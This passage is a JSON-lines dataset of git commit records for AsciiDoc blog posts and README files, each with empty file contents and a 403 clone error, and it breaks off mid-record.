{"commit":"74be800b1b7c19adb09b00742d4a6817d900609f","subject":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","message":"Update 2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_file":"_posts\/2017-06-13-Printing-a-line-of-textwithout-semicolon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1edd178ea7df10dccab04a19ac7057870bbf57b8","subject":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","message":"Update 2018-07-20-Introduction-of-Computational-Complexity.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_file":"_posts\/2018-07-20-Introduction-of-Computational-Complexity.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8cf31fa327587288b0c47c44137929950cac6fd","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae98fcf39ad3e50a036a2159857a7af6a352af53","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ce6ef70840862754d99866c885683041bdb0be8","subject":"Update 2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","message":"Update 2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","new_file":"_posts\/2016-04-06-Clientes-inseguros-H-T-M-L-injection.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"23c297c871b0d997ae9b3879bd88f6becc0888fd","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a313fcc85ea0272abcda4a60180f34d17b173499","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/dtformats,libyal\/dtformats","old_file":"documentation\/CUPS Internet Printing Protocol (IPP) format.asciidoc","new_file":"documentation\/CUPS Internet Printing Protocol (IPP) format.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/dtformats.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9565c3b3770f8131da80608a72181ce28bca70e3","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d196a9c3d5e10b095f1f8080fb83577d86451414","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6640619a0ff84ea279c2b85149cb1929520794bf","subject":"news\/2016-11-03-forge-3.3.3.final.asciidoc","message":"news\/2016-11-03-forge-3.3.3.final.asciidoc\n","repos":"forge\/docs,forge\/docs","old_file":"news\/2016-11-03-forge-3.3.3.final.asciidoc","new_file":"news\/2016-11-03-forge-3.3.3.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8a28c72c0e116331fa5a5af13a73a360bb5ea050","subject":"y2b create post These Earbuds Give You Super Powers (Seriously)","message":"y2b create post These Earbuds Give You Super Powers (Seriously)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-18-These-Earbuds-Give-You-Super-Powers-Seriously.adoc","new_file":"_posts\/2017-06-18-These-Earbuds-Give-You-Super-Powers-Seriously.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e67c1aadb903d914f922ca7ad70529ea48fe8520","subject":"Init, einfachst m\u00f6gliche Implementierungsstrategie","message":"Init, einfachst m\u00f6gliche Implementierungsstrategie\n","repos":"openlab-aux\/papstehrenwort,openlab-aux\/papstehrenwort,openlab-aux\/papstehrenwort","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openlab-aux\/papstehrenwort.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"fe6bd921cb5e79363ad706dfa2bd3baf4bf2759e","subject":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","message":"Update 2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_file":"_posts\/2011-08-17-Rendre-un-script-Ant-plus-simple-a-utiliser-via-Antform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b00e7659ad07cc3382bf019c994b7f932f5226ab","subject":"job: #11959 introducing implementation note for epoch time EE addition","message":"job: #11959 introducing implementation note for epoch time EE addition\n","repos":"rmulvey\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,keithbrown\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11959_newtim_int.adoc","new_file":"doc-bridgepoint\/notes\/11959_newtim_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83261ba3727b20fa9581d60ce14d4f0cc60255cb","subject":"\u4fee\u6539\u6587\u6863\u683c\u5f0f","message":"\u4fee\u6539\u6587\u6863\u683c\u5f0f\n","repos":"piggsoft\/simon","old_file":"src\/main\/asciidoc\/api-guide.adoc","new_file":"src\/main\/asciidoc\/api-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/piggsoft\/simon.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d6705d5798bcd560a536d09c9b727a08b6a09d5e","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79cf9453cd1036519dbc9d45482e5e75e3e87801","subject":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc'","message":"Renamed '_posts\/2019-03-15-Convert-Symantec-VIP-Token-to-TOTP.adoc' to '_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc'","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc","new_file":"_posts\/2019-03-15-Convert-Symantec-VIP-Access-Token-to-TOTP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37c92ae07d7c8233f15d14a6ed26bb77c98399f7","subject":"Update 2015-10-10-Space-Quest.adoc","message":"Update 2015-10-10-Space-Quest.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-10-Space-Quest.adoc","new_file":"_posts\/2015-10-10-Space-Quest.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9054b27d0ad67a14441451af2def90cb6fc0b01d","subject":"Update 2015-11-12-Da-Dom-huck.adoc","message":"Update 2015-11-12-Da-Dom-huck.adoc","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2015-11-12-Da-Dom-huck.adoc","new_file":"_posts\/2015-11-12-Da-Dom-huck.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b937c8d3aa5c3295182798c74b41eb2b04ebe626","subject":"Deleted _posts\/2016-11-21-Fresh-Start.adoc","message":"Deleted _posts\/2016-11-21-Fresh-Start.adoc","repos":"acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io,acristyy\/acristyy.github.io","old_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_file":"_posts\/2016-11-21-Fresh-Start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/acristyy\/acristyy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8b8ebab80528c97578abef7a58c4ef812c40428","subject":"Update 2018-02-19-Amazon-Echo.adoc","message":"Update 2018-02-19-Amazon-Echo.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_file":"_posts\/2018-02-19-Amazon-Echo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27cc2de2c00752620f43d4f3778465600bb2b18c","subject":"y2b create post Using Your Wrist To Power Your Smartphone...","message":"y2b create post Using Your Wrist To Power Your Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-20-Using%20Your%20Wrist%20To%20Power%20Your%20Smartphone....adoc","new_file":"_posts\/2018-01-20-Using%20Your%20Wrist%20To%20Power%20Your%20Smartphone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4dd4010527d97c5bdae3de66ce63f59f432f9c2","subject":"Add a new monitoring stack configuration scenario","message":"Add a new monitoring stack configuration scenario\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/monitoring-moving-monitoring-components-to-different-nodes.adoc","new_file":"modules\/monitoring-moving-monitoring-components-to-different-nodes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2080d8d0681d99b31156831afbf49082b8b55c38","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05fdc8b9222a1b4fb437636eb04c14b8b5443bcd","subject":"Added initial README.","message":"Added initial README.\n","repos":"qaware\/cloudcontrol,qaware\/cloudcontrol","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/qaware\/cloudcontrol.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a649211324f4bc1c65653733694520037f62c864","subject":"Add commit message standards","message":"Add commit message standards\n\nCreated a standard for commit messages for the team.\nStandard based off of gist from\nhttps:\/\/gist.github.com\/robertpainsi\/b632364184e70900af4ab688decf6f53\n","repos":"UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources,UCSolarCarTeam\/Recruit-Resources","old_file":"Development-Guide\/Making-Commit-Messages\/Making-Commit-Messages.adoc","new_file":"Development-Guide\/Making-Commit-Messages\/Making-Commit-Messages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/UCSolarCarTeam\/Recruit-Resources.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"4d72b72d095fcc2d5ab7952ae4b629608f3c84f5","subject":"Update 2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","message":"Update 2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","repos":"flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io,flavienliger\/flavienliger.github.io","old_file":"_posts\/2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","new_file":"_posts\/2016-03-09-fork-spawnchild-exec-Node-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flavienliger\/flavienliger.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6795642cc53b82578356c8a726ae07c3f667992","subject":"Renamed '_posts\/2018-01-09-Flutter-Report-January-2018.adoc' to '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc'","message":"Renamed '_posts\/2018-01-09-Flutter-Report-January-2018.adoc' to '_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc'","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc","new_file":"_posts\/2018-01-09-Whats-up-Flutter-January-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e164b08b7d86c0df4f6a614dd80cfc66e521abc1","subject":"y2b create post The 50 Cent Interview","message":"y2b create post The 50 Cent Interview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-01-10-The-50-Cent-Interview.adoc","new_file":"_posts\/2014-01-10-The-50-Cent-Interview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b5233beb86553fb7849ebd6d1a2b0b3e493ddc02","subject":"Update 2015-11-06-Yeah-About-that-story.adoc","message":"Update 2015-11-06-Yeah-About-that-story.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45ed0d118320e91ef57f87f122b102864b307adf","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"80680401de3ad56b2938ed845b8ca4fee06bab38","subject":"create post Unboxing Google Home Mini With Demar DeRozan!","message":"create post Unboxing Google Home Mini With Demar DeRozan!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Unboxing-Google-Home-Mini-With-Demar-DeRozan!.adoc","new_file":"_posts\/2018-02-26-Unboxing-Google-Home-Mini-With-Demar-DeRozan!.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e5427a21d76711b509c35d94e9c164d0370dadd","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phantom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1840262f9191d50bf87380cbc14540a2e4ff7ba2","subject":"Update 2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","message":"Update 2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","repos":"raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io,raloliver\/raloliver.github.io","old_file":"_posts\/2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","new_file":"_posts\/2016-12-08-Review-Lean-Startup-Primeiros-passos-da-sua-startup-enxuta.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raloliver\/raloliver.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8bc5facae6544dca893b0ccd81db070f8d311f6","subject":"Initial documentation commit","message":"Initial documentation commit\n","repos":"wildfly\/wildfly-http-client","old_file":"docs\/wire-spec-v1.asciidoc","new_file":"docs\/wire-spec-v1.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wildfly\/wildfly-http-client.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"074b8282a5919b16e461cac3a3a95d5c489bbc8a","subject":"Update 2016-09-06-TWCTF.adoc","message":"Update 2016-09-06-TWCTF.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF.adoc","new_file":"_posts\/2016-09-06-TWCTF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c693b6da33f4aca11f58393d131e5619d820e5e","subject":"Python note: check module existence","message":"Python note: check module existence\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"dee7cb172b652548aef0b899a983986769a3ee60","subject":"Add IPython startup script","message":"Add IPython startup script\n","repos":"cmpitg\/programming-language-notes","old_file":"Python.adoc","new_file":"Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"d50eead77f2eb278fc166b1d9f298d13a5fcca71","subject":"Added readme","message":"Added readme\n","repos":"griffon-plugins\/griffon-preferences-plugin,hackergarten\/griffon-preferences-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/griffon-plugins\/griffon-preferences-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"78e9c8d2e32344f5ac913a55633faff55723bb40","subject":"Create README.adoc","message":"Create README.adoc","repos":"ajneu\/basewrapper_ctor_dtor_monitoring","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ajneu\/basewrapper_ctor_dtor_monitoring.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a42c0fa3dd441d9126c7173066491652c3419548","subject":"Add a simple README for now","message":"Add a simple README for now\n","repos":"reiseburo\/beetle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reiseburo\/beetle.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71e276dddfa10031fa6df495b62b7f5f5a2d7498","subject":"empty README","message":"empty README\n","repos":"jdigger\/jgit-process","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jdigger\/jgit-process.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e70285b3bcdaa97c2e6f57c9f9732b5da0f6c87","subject":"Added README.adoc symlink for Github.","message":"Added README.adoc symlink for Github.\n","repos":"Yubico\/yubikey-neo-manager,Yubico\/yubikey-neo-manager","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubikey-neo-manager.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"16dfefa330a2d8cf3a68b7c62c730df48f8c19e1","subject":"Updated docs","message":"Updated docs\n","repos":"wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,spring-cloud\/spring-cloud-pipelines,marcingrzejszczak\/jenkins-pipeline,k0chan\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,k0chan\/spring-cloud-pipelines,spring-cloud\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines,wybczu\/spring-cloud-pipelines","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wybczu\/spring-cloud-pipelines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fdf337fc0442d1fabfecc5e817188486de184af5","subject":"y2b create post You Will Want This New Electric Skateboard","message":"y2b create post You Will Want This New Electric 